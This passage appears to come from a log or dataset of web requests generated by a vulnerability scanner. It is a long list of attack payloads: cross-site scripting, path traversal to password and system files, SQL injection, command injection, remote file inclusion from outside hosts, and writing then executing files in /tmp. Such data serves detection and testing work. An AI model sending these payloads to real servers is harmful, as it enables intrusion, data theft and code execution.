src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htpasswd.sfish/8-7\n/javascript/forums.exe\n/iktok2bw.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/vwmg565s.exe?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+0+>>esbq\n/m5103snj.mscgi?<script>cross_site_scripting.nasl</script>\n/scripts/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout=\"ver\\xa0>q91628118&rem\\xa0\n/examples/jsp/sessions/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/en-us/account/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ifl_y2qb]));die;/*\n/examples/jsp/error/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/process_description/\n/top.php?stuff=\"&ping,-w,7000,-n,1,4.3.2.1&rem,\n/fmnveedu.cgi?<script>document.cookie=\"testgfbr=7014;\"</script>\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q56134844%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/scripts/1331921922-ror_session_fixation.nasl\n/d765w06j.dll?<script>cross_site_scripting.nasl</script>\n/igtf0zon.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/_vti_bin/cfgwiz.exe\n/cgi-bin/webdist.cgi?distloc=;id\n/gy23xnjq.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/05.exe\n/main.php?stuff=ver\\x0b>q63867578&rem\\x0b\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/xdnhmjnjeg0;').\"]=1\n/en-us/s7qus4g3.jsp?<script>cross_site_scripting.nasl</script>\n/cgi-bin/php.cgi?/etc/passwd\n/0qhcnefz.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/gdxlwjnlsr6i.shtml\n/ybz5rz7a.php3?<script>document.cookie=\"testsbvw=6289;\"</script>\n//q54599877&q3916\"q3916<q3916>q54599877\n/subscriptions.dll\n/w4996nr0.asp?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/colors/admin/admin.php?sid='\n/a0imiuf1.cfm?<script>document.cookie=\"testxqrn=4654;\"</script>\n/javascript/pricing.exe\n/scripts/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/fdscript/\n/recordings/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/javascript/callout.exe\n/examples/servlets/servlet/sawmill6cl.exe?ho+{complete_version}\n/y8pmygrp.fts?<script>cross_site_scripting.nasl</script>\n/cacti/directory.php?dir=;cat /etc/passwd\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ysytjpdzlh0+>+/dev/null+&'); function v\n/eei78ore.fts?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ver >q85487167&rem \n/cgi-exe/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/examples/jsp/cal/al_initialize.php?alpath=/etc/passwd\\x00\n/phpmyadmin/search.pl?form=../../../../../../etc/passwd\\x00\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1\\;id\n/scripts/tst.bat|type c:\\winnt\\win.ini\n/scripts/nffhikq061nq.cgi\n/cgi-exe/c32web.exe/changeadminpassword\n/en-us/account/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>\n/preview.php?php_script_path=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=dir\n/examples/jsp/error/starnet/addons/slideshow_full.php?album_name='925462004\nftp://192.168.27.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/bmeun223.do?<script>document.cookie=\"testhhwu=7044;\"</script>\n/examples/jsp/jsp2/jspx/bb-hist.sh?histfile=../../../../../etc/passwd\n<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/kid's-r0/\n/5o9zq43e.kspx?<script>cross_site_scripting.nasl</script>\n/cacti/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/help.php?q=\"&ver;>q83399542&rem;\n/include/sql.php?include_path=/etc/passwd\\x00\n/main.php?stuff=\"ver,>q37721326&rem,\n/ao22ww7y.cgi?<script>document.cookie=\"testqppc=8767;\"</script>\n/p043snfr.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/examples/jsp/colors/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/recordings/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/m2fpztty.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/lmw4r201.aspx?<script>document.cookie=\"testwews=8477;\"</script>\n/scripts/printfaq.php?lng=en&pg=1\n/b5xdqgz2.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tukodz3j.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/phpmyadmin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/starnet/addons/slideshow_full.php?album_name='769899449\n/examples/jsp/checkbox/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/scripts/calendar.php?month=' union select 1,1,'1331919195','calendarix_month_sql_injection.nasl',1 #\n/passwdqc_random/\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/pxvobegahd0;').\"]=1\n/help.php?q=\"&del\\x09q66374774&rem\\x09\n/0qhcnefz.html?<script>cross_site_scripting.nasl</script>\n/cacti/cvslog.cgi?file=<script>window.alert</script>\n/examples/jsp/cal/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/javascript/postgresql.exe\n/manager/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/checkbox/sources/functions.php?root_path=/etc/passwd\\x00\n/manager/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/nuke/modules.php?name=network_tools&file=index&func=ping_host&hinput=;id\n/zroo33l4.cfc?<script>document.cookie=\"testiklc=904;\"</script>\n/phpmyadmin/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/javascript/cgi-script.exe\n/main.php?stuff=\"&rm,q93432438&rem,\n/javascript/.passwd.xml\n/main.php?logout=\"\\x0adel q86286812 #\n/..%2f..%2f..%2f..%2f..%2f../windows/repair/sam\n/esmozg5d.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?templates_dir=/etc/passwd\\x00\n/en-us/account/webadmin.php?show=/etc/passwd\n/examples/servlets/servlet/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/phpmyadmin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/javascript/dcforum.exe\n/ewc3rz1l.nsf?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/phpmyadmin/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/169okeyj.x?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/servlet/custmsg?guestname=<script>alert(\\\"vulnerable\\\")</script>\n/javascript/redirect.exe\n/examples/servlets/servlet/perl.exe?-v\n/dslpwt15.x?<script>document.cookie=\"testtkio=5454;\"</script>\n/phpwebsite/index.php?module=search&sea_search_op=continue&pda_limit=10\\\"><script>alert('vulnerable')</script>\n/m2fpztty.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/core/api.php?t_path_core=/etc/passwd\\x00\n/m5103snj.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ssi/envout.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\n/zmvq66jy.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/offices.exe\n/eg2u8pbv.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=q27938679&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=\n/starnet/addons/slideshow_full.php?album_name='937923102\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008637')</script>\n/altercast/altercast?op=<script>alert(\"adobe_document_server_61.nasl\")</script>\n/pix_passwd/\n/phpmyadmin/viewcvs.cgi/?cvsroot=<script>foo</script>\n/cgi-exe/query?mss=../config\n/psynch/nph-psa.exe?css=http://192.168.202.118:8080/ghl9il?\n/8t9v8k7x.pl?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/phpmyadmin/index.php?cid='\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/scripts/tomcat_proxy_directory_traversal.nasl1331922105\n/xsqln7eb.idc?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/examples/jsp/num/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/bl8sefdm.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d44uk9h2.php?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/playing.exe\n/examples/jsp/num/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/en-us/7o5qp766.do?<script>cross_site_scripting.nasl</script>\n/cgi-local/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/index.php?board=nonexistant341477015\n/top.php?stuff=\"rm\\x09q66382972&rem\\x09\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1071637599--\n/javascript/traceroute.exe\n/0z575z74.jspa?<script>document.cookie=\"testuhsv=9753;\"</script>\n/recordings/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/zuihld5m.do?<script>cross_site_scripting.nasl</script>\n/u95h6ymu.do?<script>document.cookie=\"testkhwc=4028;\"</script>\n/nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n/cgi-bin/bb-hist.sh?histfile=../../../../../../../../../../etc/passwd\n/examples/jsp/error/simple/view_page?mv_arg=|cat /etc/passwd|\n/main.php?logout=\"ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/9o6g5vkn.htm?<script>cross_site_scripting.nasl</script>\n/?<script>document.cookie=\"testnago=4518;\"</script>\n/cgi-bin/eboard40//index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\"|ping\\x09-w\\x0910000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/tukodz3j.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/5o9zq43e.do?<script>cross_site_scripting.nasl</script>\n/g8nu2yy7.fts?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ver\\xa0>q51679818&rem\\xa0\n/hrttz9fj.cfm?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/examples/jsp/colors/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/h4bi26jd.fts?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/help.php?q=\"&ver,>q46141422&rem,\n/t3af3tdz.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vac1l5vm.dll?<script>cross_site_scripting.nasl</script>\n/scripts/remotehtmlview.php?phpads_path=http://xxxxxxxx\n/forum1.asp?n=1753&amp;nn=/....../boot.ini\n/men's_health/\n/examples/jsp/jsp2/jspx/newsscript.pl?mode=admin\n/uvazfs7p.exe?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/scripts/jammail.pl?job=showoldmail&mail=|id|\n/aoy7kzbh.exe\n/examples/jsp/error/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/;s=7;c=1013;a=1;l=1;p=20;sc=5661;n=0;b=16433/\n/yef5f3d5.php3?<script>document.cookie=\"testcrcv=6167;\"</script>\n/cgi-bin/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/main.php?logout=&ver&rem;\n/examples/jsp/colors/sawmillcl.exe?ho+{complete_version}\n/examples/jsp/cal/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/u95h6ymu.cfm?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/examples/jsp/jsp2/el/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1\n/sys/code/box.inc.php?config[\"sipssys\"]=http://192.168.202.118:8080/ghl9il?\n/iv5vkgam.aspx?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/actscript_icon/\n/ap58k3ci.cgi?<script>cross_site_scripting.nasl</script>\n/9ko6m4c8.php3?<script>document.cookie=\"testylik=3403;\"</script>\n/top.php?stuff=\"&del;q13316957&rem;\n/main.php?logout=\"|sleep 7 #\n/j734qobz.dll?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"sleep 7 #\n/x7pclv4s.aspx?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/examples/jsp/jsp2/el/docs.php?doc=../jpgraph-1.12.1/docs/index\n/en-us/oie504mr.asp?<script>document.cookie=\"testtpby=7052;\"</script>\n/recordings/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/help.php?q='&del q89912813 #\n/scripts/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/qb2xy9aw.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/mylog.phtml?screen=/etc/passwd\n/main.php?stuff=\"\\x0auname >q55324883 #\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=q22572623&scr_height=&scr_width=\n/javascript/htpasswd.sql\n/parltranscript050704en/\n/examples/jsp/jsp2/jspx/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/recordings/search.pl?form=../../../../../../etc/passwd\\x00\n/d7ktpmcq.html?<script>cross_site_scripting.nasl</script>\n/shared_order.php?sharedplanid=1\"><script>alert(\"411745577557\");</script><\"1\n/examples/jsp/jsp2/jspx/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/scripts/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/scripts/phpinfo.php\n/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/javascript/jbossas.exe\n/forum-ra_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\n//q47719336&#x26;q1431&#x22;q1431&#x3c;q1431&#x3e;q47719336\n/nsn/..\\util/send.bas\n/<script>document.cookie=\"testlerc=2575;\"</script>\n/bxnyrhmh.php3?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/fo564rei.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/7o5qp766.exe?<script>cross_site_scripting.nasl</script>\n/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/webcgi/r.cgi?file=../../../../../../../../../../etc/passwd\n/dailyscripture_125x125/\n/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/iyeafeugpn0;'); function v\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- \n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(964473578)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1006806433)</script>\n/cgi-bin/lang/index.php?file=/etc/passwd\n/eei78ore.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/r3le3om5.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/irbf6nj7oyfh.php3\n/examples/jsp/sessions/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/help.php?q=\"rm,q99215968&rem,\n/vwmg565s.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/top.php?stuff=ver\\x0b>q96485831&rem\\x0b\n/bxnyrhmh.fts?<script>document.cookie=\"testmjct=1867;\"</script>\n/top.php?stuff=\"del\\x09q73669717\\x09#\n//\\..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/b4vng02k.jspa?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/top.php?stuff=\"|ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/g3w7y7u5.exe?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/examples/jsp/checkbox/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/oie504mr.php?<script>document.cookie=\"testtpby=7052;\"</script>\n/javascript/matrix.exe\n/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999\\x0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd\n<script>document.cookie=\"testlerc=2575;\"</script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/checkbox/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/s7qus4g3.idc?<script>cross_site_scripting.nasl</script>\n/jobinterviewdo'sanddon'ts/\n/scripts/index.php?board=nonexistant107150276\n/iajtej82.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"|sleep\\x097\\x09#\n/help.php?q=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411\n/examples/jsp/jsp2/jspx/wa.exe?debug-show-version\n/6wb70v0b.jspa?<script>cross_site_scripting.nasl</script>\n/fa8p8lr8.exe?<script>cross_site_scripting.nasl</script>\n/news.php?config[script_path]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/scripts/b0j2ijssh6cu.cgi\n/dslpwt15.cgi?<script>document.cookie=\"testtkio=5454;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+1a+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n/scripts/login.php?error=>\"><script>alert('daloradius_error_xss.nasl')</script>\n/scripts/yfmo7jpwvpv1.cgi\n/scripts/_xuzlr7swn95.inc\n/8t9v8k7x.aspx?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/jnv890lt.php3?<script>cross_site_scripting.nasl</script>\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438\n/?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/xdfdsfcbur.sh+>+/dev/null+&').\"]=1\n/main.php?stuff=\"\\x0ddel\\x09q25635537\\x09#\n/cgi-bin/bb-hostsvc.sh?hostsvc=../../../../../../../../../../etc/passwd\n/perriconeprescriptionaudio/\n/tuwjta1w.cfm?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/zuihld5m.jsp?<script>cross_site_scripting.nasl</script>\n/en-us/w4996nr0.jsp?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/3m5knyc4.jsp?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/examples/jsp/error/index.php?p='nessus\n/examples/jsp/num/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/hjdzm96v.idc?<script>document.cookie=\"testbyqe=7474;\"</script>\n/mirror-tony hawk's underground 2/\n/scripts/index.php?src=1&_common=1&time=1332010418&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/6n7aacgg.html?<script>cross_site_scripting.nasl</script>\n/xsqln7eb.exe?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/main.php?stuff=&ver >q72468745&rem \n/top.php?stuff=\"del;q48162266&rem;\n/scripts/index.php?edit=nonexistant1846881513\n/p043snfr.mscgi?<script>cross_site_scripting.nasl</script>\n/fcgi-bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/t3af3tdz.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/pssdseehtgdp.pl\n/javascript/props.exe\n/help.php?chapter=<script>alert('vulnerable')</script>\n/copatranscript_20061108/\n/main.php?logout=\"ver&rem\\x09\n/main.php?logout=&ver\\x09>q78458649&rem\\x09\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,877864692409,4,5,6,7,8,9,10,11--\n/main.php?stuff=\"&del;q86839174&rem;\n/cgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/phpmyadmin/cal_week.php?op=week&catview=999'\n/examples/jsp/error/help.php?section='qualiteam_xcart_sql_xss.nasl\n/7u1pb2xi.aspx?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/cgi-bin/htmlscript?../../../../../../../../../etc/passwd\n/scripts/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"&uname >q33239588 #\n/examples/servlets/servlet/index.php?string='\n/en-us/s7qus4g3.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/oie504mr.aspx?<script>document.cookie=\"testtpby=7052;\"</script>\n/cartouche-inscriptions/\n//<body><script/src=\"http://www.example.com/test?rnd=q47147249\"></script>\n/scripts/shop.plx/page=nessus157183956\n/t578vqea.pl?<script>document.cookie=\"testsory=7676;\"</script>\n/ht8pn8uq.asp?<script>cross_site_scripting.nasl</script>\n/job_descriptions/\n/y8pmygrp.php?<script>cross_site_scripting.nasl</script>\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.96:8080/txenjrxf3?\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ikdwpiudzb0+>+/dev/null+&'); function v\n/javascript/bak.exe\n/l752x1ry.dll?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ver;>q63898211&rem;\n/javascript/pkg.exe\n/fo564rei.cgi?<script>cross_site_scripting.nasl</script>\n/ybz5rz7a.kspx?<script>document.cookie=\"testsbvw=6289;\"</script>\n/iisadmpwd/..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/scripts/index.jsp\n/main.php?stuff=\"|sleep 10 #\n/jw64yq8u.jspa?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/wwwboard/passwd.txt\n/default.asp?executethelogin=1&users_email='1@1.com&users_password=proofofconcept\n/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/en-us/ddoworrl.idc?<script>document.cookie=\"testvlau=8517;\"</script>\n/ovcgi/snmpviewer.exe\n/javascript/bkup.exe\n/includes/phpdig/includes/config.php?relative_script_path=@rfiurl\n/main.php?stuff='\\x0auname\\x09>q13973431\\x09#\n/javascript/tos.exe\n/examples/jsp/cal/calendar.php?month=' union select 1,1,'1331904432','calendarix_month_sql_injection.nasl',1 #\n/manager/wikka.php?wakka=homepage/../../actions/wikkachanges\n/help.php?q=\"ping;-w;8000;-n;1;1.2.3.4|rem;\n/scripts/update.php\n/javascript/.passwd.tar\n/admin/index.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls\n/examples/jsp/colors/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/scripts/sawmill6cl.exe?ho+{complete_version}\n/en-us/s7qus4g3.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1332009304\n/scripts/man2web?program=-p id ls\n/cgi-bin/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/webevent.cgi?cmd=><script>alert(410706083387)</script>\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6194853687.tmp\n/u8yiqilu.cfm?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/scripts/module.php?module=osticket&file=/modules/osticket/admin.php\n/cgi-bin/index.php?id='union/**/select/**/0,0,82311197,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/en-us/s7qus4g3.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/en-us/h5sc3gxy.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/dslpwt15.cfc?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/scripts/index.php?id=mumrj3sj0o'\n/cacti/zpanel.php?page=/etc/passwd\\x00\n/javascript/line.exe\n/en-us/ddoworrl.do?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/javascript/ssl.exe\n/recordings/sendcard.php?view=1&id='sendcard_sql.nasl\n/cgi-bin/index.php?post=../config/password\n/pbserver/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee612207409.~1~\n/7u1pb2xi.idc?<script>document.cookie=\"testlwwz=718;\"</script>\n/scripts/vhost.php?action=logout&time=1331909130\n/examples/servlets/servlet/config.php?returnpath=/etc/passwd\\x00\n/javascript/fuckyou.exe\n/javascript/07.exe\n/mapserv.exe?map=mapserver_detect.nasl.map\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/2aibfaczmac8?\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/jibrf.jsp\\x00\n/ht8pn8uq.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/fnwhrxyd.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&rm\\xa0q65461871&rem\\xa0\n/cgi-bin/fileseek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd\n/scripts/ggvfa_wichxq.cgi\n/modules.php?op=modload&name=web_links&file=index&l_op=viewlink&cid=<script>alert('vulnerable')</script>\n/cacti/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/aj3pf49c.kspx?<script>document.cookie=\"testnofv=4170;\"</script>\n<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/main.php?logout=\"ver,>q64292722&rem,\n/scripts/iisadmin/ism.dll\n/help.php?q='rm\\x09q97628579\\x09#\n/s7qus4g3.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lang/index.php?file=/etc/passwd\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919000\n/recordings/myevent.php?myevent_path=/etc/passwd\\x00\n/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/nmw0do67.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\\x0auname >q18828288 #\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904374)</script>\n/examples/jsp/sessions/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/o35zot2r.nsf?<script>cross_site_scripting.nasl</script>\n/0rufe52p.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/examples/jsp/colors/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/viagraprescription/\n/t3af3tdz.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h21y8w52.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/main.php?stuff=\"&rm\\x0bq72441193&rem\\x0b\n/home/search.asp?nchannel='1\n/examples/jsp/jsp2/el/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/ap58k3ci.x?<img 